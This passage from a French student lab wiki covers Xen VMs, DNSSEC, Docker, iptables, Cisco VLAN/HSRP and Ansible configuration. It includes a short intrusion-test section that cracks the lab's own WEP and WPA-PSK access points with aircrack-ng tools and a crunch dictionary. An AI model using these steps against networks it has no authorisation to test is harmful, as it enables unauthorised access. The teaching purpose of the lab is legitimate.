La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Partie  ASR ==&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
&lt;br /&gt;
Ansible permet l'automatisation par connexion sans mot de passe.&lt;br /&gt;
Il faut d'abord générer une clef asymétrique :&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
&lt;br /&gt;
Installation de la clef publique sur les machines virtuelles 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Il faut  installer Ansible : &lt;br /&gt;
 apt install ansible&lt;br /&gt;
====Hosts====&lt;br /&gt;
Ensuite il faut rédiger l'inventaire ( /etc/ansible/hosts ) c'est un fichier yaml, il faut très attention à la syntaxe. Ce fichier regroupe le parc informatique :&lt;br /&gt;
&lt;br /&gt;
 all:&lt;br /&gt;
 hosts:&lt;br /&gt;
  interne:&lt;br /&gt;
    ansible_host: 192.168.0.2&lt;br /&gt;
 children:&lt;br /&gt;
  serveur-web:&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.[1:6]&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter automatique, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est une liste des tâches à effectuer sur ces machines.&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52019</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52019"/>
				<updated>2020-01-05T15:21:19Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Sécurisation du réseau */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
====SSH====&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En première approche, nous avons souhaité activer une connexion sécurisée (SSH) de management en créant des clés RSA et une configuration VTY mais le commutateur n'a pas l'air, à première vue, d'implémenter cette fonctionnalité  nous laissant qu'avec du Telnet (en Clair) que nous avons donc décidé de ne pas configurer.&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain Interface (BDI)&lt;br /&gt;
&lt;br /&gt;
HSRP: Hot standby router protocol [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus]&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
